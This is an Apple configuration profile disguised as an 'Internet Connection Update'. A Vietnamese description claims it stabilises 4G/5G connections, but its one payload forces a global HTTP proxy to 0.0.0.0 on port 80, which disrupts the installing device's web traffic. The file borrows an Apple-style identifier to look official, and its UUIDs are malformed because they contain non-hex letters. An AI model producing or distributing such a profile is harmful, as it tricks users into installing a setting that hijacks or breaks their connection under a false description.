<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>PayloadIdentifier</key>
			<string>com.apple.proxy.http.global.v11.9</string>
			<key>PayloadType</key>
			<string>com.apple.proxy.http.global</string>
			<key>PayloadUUID</key>
			<string>E1F2G3H4-I5J6-K7L8-M9N0-P1Q2R3S4T5U6</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>ProxyServer</key>
			<string>0.0.0.0</string> <key>ProxyServerPort</key>
			<integer>80</integer>
			<key>ProxyType</key>
			<string>Manual</string>
		</dict>
	</array>
	<key>PayloadDescription</key>
	<string>Cau hinh tu dong cap nhat thong so mang de on dinh ket noi 4G/5G.</string>
	<key>PayloadDisplayName</key>
	<string>Internet Connection Update</string>
	<key>PayloadIdentifier</key>
	<string>com.sys.net.update.v11.9</string>
	<key>PayloadOrganization</key>
	<string>Network Services</string>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>F2G3H4I5-J6K7-L8M9-N0P1-Q2R3S4T5U6V7</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
